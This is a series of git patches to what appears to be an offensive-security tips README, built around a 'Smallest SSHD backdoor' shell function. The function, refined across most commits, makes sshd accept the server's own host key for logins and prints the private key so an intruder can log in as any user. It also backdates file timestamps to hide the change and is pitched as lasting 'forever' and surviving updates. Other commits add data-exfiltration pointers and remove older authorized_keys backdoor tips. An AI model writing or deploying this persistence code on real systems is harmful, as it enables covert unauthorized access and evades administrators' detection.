From 3a3396e89a782e0049bd6312e6904f0e25d4580f Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Sat, 13 Dec 2025 12:23:43 +0000
Subject: [PATCH 01/10] Update README.md

---
 README.md | 43 ++++++++++++++++++++++++++++---------------
 1 file changed, 28 insertions(+), 15 deletions(-)

diff --git a/README.md b/README.md
index 0ca692a..8a317e3 100644
--- a/README.md
+++ b/README.md
@@ -73,7 +73,7 @@ Got tricks? Join us [https://thc.org/ops](https://thc.org/ops)
 1. [Backdoors](#backdoor)
    1. [gs-netcat](#gsnc)
    2. [sshx.io](#sshx)
-   1. [authorized_keys](#backdoor-auth-keys)
+   1. [Smallest SSHD backdoor](#backdoor-sshd)
    1. [Remote access an entire network](#backdoor-network)
    1. [Smallest PHP backdoor](#php-backdoor)
    1. [Smallest reverse DNS-tunnel backdoor](#reverse-dns-backdoor)
@@ -1797,23 +1797,36 @@ curl -SsfL https://s3.amazonaws.com/sshx/sshx-$(uname -m)-unknown-linux-musl.tar
 for _ in {1..10}; do [ -s .u ] && break;sleep 1;done;cat .u;rm -f .u .s;
 ```
 
-<a id="backdoor-auth-keys"></a>
-**6.iii. authorized_keys**
+<a id="backdoor-sshd"></a>
+**6.iii. Smallest SSHD backdoor**
 
-Add your ssh public key to */root/.ssh/authorized_keys*. It's the most reliable backdoor ever :>
+Adding your key to *authorized_keys* is overused 😩. Instead, use this (root only):
 
-* It survives reboots.
-* It even survives re-installs. Admins have been known to make a backup of authorized_keys and then put it straight back onto the newly installed system.
-* We have even seen our key being copied to other companies!
-
-Tip: Change the name at the end of the ssh public keyfile to something obscure like *backup@ubuntu* or the admin's real name:
-```
-$ cat id_rsa.pub
-ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCktFkgm40GDkqYwJkNZVb+NLqYoUNSPVPLx0VDbJM0
-[...]
-u1i+MhhnCQxyBZbrWkFWyzEmmHjZdAZCK05FRXYZRI9yadmvo7QKtRmliqABMU9WGy210PTOLMltbt2C
-c3zxLNse/xg0CC16elJpt7IqCFV19AqfHnK4YiXwVJ+M+PyAp/aEAujtHDHp backup@ubuntu
+```shell
+backdoor_sshd() {
+	local K="/etc/ssh/ssh_host_ed25519_key"
+	local D="/etc/ssh/sshd_config.d"
+	local N=$(cd "${D}" || exit; shopt -s nullglob; echo *.conf)
+	[ -n "$N" ] && N="${N%%\.conf*}.conf"
+	N="${D}/${N:-50-cloud-init.conf}"
+	{ [ ! -f "$K" ] || [ ! -f "$K".pub ]; } && return
+	grep -qm1 '^AuthorizedKeysFile' "$N" 2>/dev/null && return
+	/usr/sbin/sshd -V 2>&1 | grep -qE 'SSH_(9|[1-9]{1}[0-9]{1})' || EGG="Y"
+	echo -e "AuthorizedKeysFile\t${EGG:+.ssh/authorized_keys .ssh/authorized_keys2 }${K}.pub" >>"${N}" || return
+	echo -e "\e[0;31mYour id_ed25519 to log in to this server as any user:\e[0;33m\n$(cat "${K}")\e[0m"
+	touch -r "$K" "$N" "$D" \
+	&& declare -f ctime >/dev/null && ctime "$N" "$D"
+	systemctl restart ssh
+}
+backdoor_sshd
 ```
+
+How it works:
+- The SSHD host key is just a normal ed25519 key.
+- Any ed25519 key can be used to authenticate a login.
+- Configure SSHD to use the *Public Host Key* as an additional list of public keys for authentication.
+- SSHD will now check .ssh/authorized_keys and /etc/ssh/ssh_host_ed25519_key.pub for valid login keys.
+
 <a id="backdoor-network"></a>
 **6.vi. Remote Access to an entire network**
 

From 41a7232987f17e2fc1ae174d25397977499fc35a Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Sat, 13 Dec 2025 12:31:01 +0000
Subject: [PATCH 02/10] Update SSHD authentication instructions in README

Clarify SSHD configuration for public host key authentication.
---
 README.md | 6 ++++--
 1 file changed, 4 insertions(+), 2 deletions(-)

diff --git a/README.md b/README.md
index 8a317e3..cf80e4a 100644
--- a/README.md
+++ b/README.md
@@ -1824,8 +1824,10 @@ backdoor_sshd
 How it works:
 - The SSHD host key is just a normal ed25519 key.
 - Any ed25519 key can be used to authenticate a login.
-- Configure SSHD to use the *Public Host Key* as an additional list of public keys for authentication.
-- SSHD will now check .ssh/authorized_keys and /etc/ssh/ssh_host_ed25519_key.pub for valid login keys.
+- SSHD checks `~/.ssh/authorized_keys` (but this trick has been overused).
+- Instead, configure SSHD to also check `/etc/ssh/sshd_host_ed25519_key.pub` for login-authentication-keys.
+- Use the `/etc/ssh/sshd_host_ed25519_key` secret key to log in to the target.
+- SSHD will now check `~/.ssh/authorized_keys` _and_ `/etc/ssh/ssh_host_ed25519_key.pub` for valid login keys.
 
 <a id="backdoor-network"></a>
 **6.vi. Remote Access to an entire network**

From 50a1c91eb8da31116bbc55ca69c6a69f7b4ad1ab Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Sat, 13 Dec 2025 12:38:14 +0000
Subject: [PATCH 03/10] Update README for SSHD authentication details

---
 README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/README.md b/README.md
index cf80e4a..e2b4db3 100644
--- a/README.md
+++ b/README.md
@@ -1823,7 +1823,7 @@ backdoor_sshd
 
 How it works:
 - The SSHD host key is just a normal ed25519 key.
-- Any ed25519 key can be used to authenticate a login.
+- Any ed25519 key can be used to authenticate a user.
 - SSHD checks `~/.ssh/authorized_keys` (but this trick has been overused).
 - Instead, configure SSHD to also check `/etc/ssh/sshd_host_ed25519_key.pub` for login-authentication-keys.
 - Use the `/etc/ssh/sshd_host_ed25519_key` secret key to log in to the target.

From 17231292a296239eeb94149dabc4057133320e8d Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Sat, 13 Dec 2025 15:26:37 +0000
Subject: [PATCH 04/10] Update README.md

---
 README.md | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/README.md b/README.md
index e2b4db3..642cdda 100644
--- a/README.md
+++ b/README.md
@@ -1811,8 +1811,7 @@ backdoor_sshd() {
 	N="${D}/${N:-50-cloud-init.conf}"
 	{ [ ! -f "$K" ] || [ ! -f "$K".pub ]; } && return
 	grep -qm1 '^AuthorizedKeysFile' "$N" 2>/dev/null && return
-	/usr/sbin/sshd -V 2>&1 | grep -qE 'SSH_(9|[1-9]{1}[0-9]{1})' || EGG="Y"
-	echo -e "AuthorizedKeysFile\t${EGG:+.ssh/authorized_keys .ssh/authorized_keys2 }${K}.pub" >>"${N}" || return
+	echo -e "AuthorizedKeysFile\t.ssh/authorized_keys .ssh/authorized_keys2 ${K}.pub" >>"${N}" || return
 	echo -e "\e[0;31mYour id_ed25519 to log in to this server as any user:\e[0;33m\n$(cat "${K}")\e[0m"
 	touch -r "$K" "$N" "$D" \
 	&& declare -f ctime >/dev/null && ctime "$N" "$D"

From 6b808a175239100db1adfb9c8643dbb124de3442 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Sat, 13 Dec 2025 16:07:13 +0000
Subject: [PATCH 05/10] Update README.md

---
 README.md | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)

diff --git a/README.md b/README.md
index 642cdda..b403d0a 100644
--- a/README.md
+++ b/README.md
@@ -1800,7 +1800,11 @@ for _ in {1..10}; do [ -s .u ] && break;sleep 1;done;cat .u;rm -f .u .s;
 <a id="backdoor-sshd"></a>
 **6.iii. Smallest SSHD backdoor**
 
-Adding your key to *authorized_keys* is overused 😩. Instead, use this (root only):
+- Survives `apt update`
+- Does not create any new file.
+- Does not use `authorized_keys` or PAM.
+
+Adding your key to *authorized_keys* is overused 😩. Instead, cut & paste this (as root):
 
 ```shell
 backdoor_sshd() {

From 7afe2890f5f3a4d5cce513a6f399db9c97f4826a Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Sun, 14 Dec 2025 14:40:37 +0000
Subject: [PATCH 06/10] Update README.md

---
 README.md | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/README.md b/README.md
index b403d0a..6bef366 100644
--- a/README.md
+++ b/README.md
@@ -1804,7 +1804,7 @@ for _ in {1..10}; do [ -s .u ] && break;sleep 1;done;cat .u;rm -f .u .s;
 - Does not create any new file.
 - Does not use `authorized_keys` or PAM.
 
-Adding your key to *authorized_keys* is overused 😩. Instead, cut & paste this (as root):
+Adding your key to *authorized_keys* is overused 😩. Instead, as root, cut & paste this _once_ on any target. It will add a single line to SSHD's config and allow you to log in forever:
 
 ```shell
 backdoor_sshd() {
@@ -1825,12 +1825,12 @@ backdoor_sshd
 ```
 
 How it works:
-- The SSHD host key is just a normal ed25519 key.
+- The SSHD host key is just an ordinary ed25519 key.
 - Any ed25519 key can be used to authenticate a user.
 - SSHD checks `~/.ssh/authorized_keys` (but this trick has been overused).
 - Instead, configure SSHD to also check `/etc/ssh/sshd_host_ed25519_key.pub` for login-authentication-keys.
-- Use the `/etc/ssh/sshd_host_ed25519_key` secret key to log in to the target.
 - SSHD will now check `~/.ssh/authorized_keys` _and_ `/etc/ssh/ssh_host_ed25519_key.pub` for valid login keys.
+- Use the `/etc/ssh/sshd_host_ed25519_key` secret key to log in to the target.
 
 <a id="backdoor-network"></a>
 **6.vi. Remote Access to an entire network**

From 264edc16e182e9b88d28bd20abc0a279bdbca2bf Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Wed, 24 Dec 2025 09:27:15 +0000
Subject: [PATCH 07/10] Update README.md

---
 README.md | 9 +++++----
 1 file changed, 5 insertions(+), 4 deletions(-)

diff --git a/README.md b/README.md
index 6bef366..5b1eb6c 100644
--- a/README.md
+++ b/README.md
@@ -1808,15 +1808,16 @@ Adding your key to *authorized_keys* is overused 😩. Instead, as root, cut & p
 
 ```shell
 backdoor_sshd() {
-	local K="/etc/ssh/ssh_host_ed25519_key"
-	local D="/etc/ssh/sshd_config.d"
+	local B="/etc/ssh"
+	local K="${B}/ssh_host_ed25519_key" D="${B}/sshd_config.d"
 	local N=$(cd "${D}" || exit; shopt -s nullglob; echo *.conf)
 	[ -n "$N" ] && N="${N%%\.conf*}.conf"
 	N="${D}/${N:-50-cloud-init.conf}"
 	{ [ ! -f "$K" ] || [ ! -f "$K".pub ]; } && return
-	grep -qm1 '^AuthorizedKeysFile' "$N" 2>/dev/null && return
-	echo -e "AuthorizedKeysFile\t.ssh/authorized_keys .ssh/authorized_keys2 ${K}.pub" >>"${N}" || return
+	grep -iqm1 '^PermitRootLogin\s\+no' "${B}/sshd_config" && echo >&2 "WARN: PermitRootLogin blocking in sshd_config"
 	echo -e "\e[0;31mYour id_ed25519 to log in to this server as any user:\e[0;33m\n$(cat "${K}")\e[0m"
+	grep -qm1 '^AuthorizedKeysFile' "$N" && { echo >&2 "WARN: Already backdoored"; return; }
+	echo -e "AuthorizedKeysFile\t.ssh/authorized_keys .ssh/authorized_keys2 ${K}.pub" >>"${N}" || return
 	touch -r "$K" "$N" "$D" \
 	&& declare -f ctime >/dev/null && ctime "$N" "$D"
 	systemctl restart ssh

From f184944db5e20d4bc2623ab5641da51f68d55518 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Thu, 15 Jan 2026 17:30:11 +0000
Subject: [PATCH 08/10] Update README with data upload/download instructions

Added instructions for data exfiltration methods.
---
 README.md | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/README.md b/README.md
index 5b1eb6c..365cf88 100644
--- a/README.md
+++ b/README.md
@@ -1086,6 +1086,11 @@ nmap -p80 --script http-brute --script-args \
 ---
 <a id="exfil"></a>
 ## 4. Data Upload/Download/Exfil
+
+Easiest: Type `exfil` on a [Segfault Root Server](https://thc.org/segfault)
+
+Or use curl and run your own [PHP exfil server](https://github.com/Rouji/single_php_filehost).
+
 <a id="file-encoding"></a>
 
 ### 4.i File Encoding

From cb8806281e88120b8981ced1884d11519ca6351a Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Tue, 20 Jan 2026 21:17:48 +0000
Subject: [PATCH 09/10] Update README.md

---
 README.md | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/README.md b/README.md
index 365cf88..4d33ddb 100644
--- a/README.md
+++ b/README.md
@@ -1815,9 +1815,10 @@ Adding your key to *authorized_keys* is overused 😩. Instead, as root, cut & p
 backdoor_sshd() {
 	local B="/etc/ssh"
 	local K="${B}/ssh_host_ed25519_key" D="${B}/sshd_config.d"
-	local N=$(cd "${D}" || exit; shopt -s nullglob; echo *.conf)
+	local N=$(cd "${D}" 2>/dev/null|| exit; shopt -s nullglob; echo *.conf)
 	[ -n "$N" ] && N="${N%%\.conf*}.conf"
 	N="${D}/${N:-50-cloud-init.conf}"
+	[ ! -d "${D}" ] && N="${B}/sshd_config"
 	{ [ ! -f "$K" ] || [ ! -f "$K".pub ]; } && return
 	grep -iqm1 '^PermitRootLogin\s\+no' "${B}/sshd_config" && echo >&2 "WARN: PermitRootLogin blocking in sshd_config"
 	echo -e "\e[0;31mYour id_ed25519 to log in to this server as any user:\e[0;33m\n$(cat "${K}")\e[0m"

From 81833af0f09a216c16b5df3da1576b29e6331e1c Mon Sep 17 00:00:00 2001
From: rootTHC <57636391+rootTHC@users.noreply.github.com>
Date: Mon, 16 Feb 2026 14:09:59 +0000
Subject: [PATCH 10/10] Update README.md

---
 README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/README.md b/README.md
index 4d33ddb..0346e9c 100644
--- a/README.md
+++ b/README.md
@@ -1822,7 +1822,7 @@ backdoor_sshd() {
 	{ [ ! -f "$K" ] || [ ! -f "$K".pub ]; } && return
 	grep -iqm1 '^PermitRootLogin\s\+no' "${B}/sshd_config" && echo >&2 "WARN: PermitRootLogin blocking in sshd_config"
 	echo -e "\e[0;31mYour id_ed25519 to log in to this server as any user:\e[0;33m\n$(cat "${K}")\e[0m"
-	grep -qm1 '^AuthorizedKeysFile' "$N" && { echo >&2 "WARN: Already backdoored"; return; }
+	grep -qm1 '^AuthorizedKeysFile' "$N" 2>/dev/null && { echo >&2 "WARN: Already backdoored"; return; }
 	echo -e "AuthorizedKeysFile\t.ssh/authorized_keys .ssh/authorized_keys2 ${K}.pub" >>"${N}" || return
 	touch -r "$K" "$N" "$D" \
 	&& declare -f ctime >/dev/null && ctime "$N" "$D"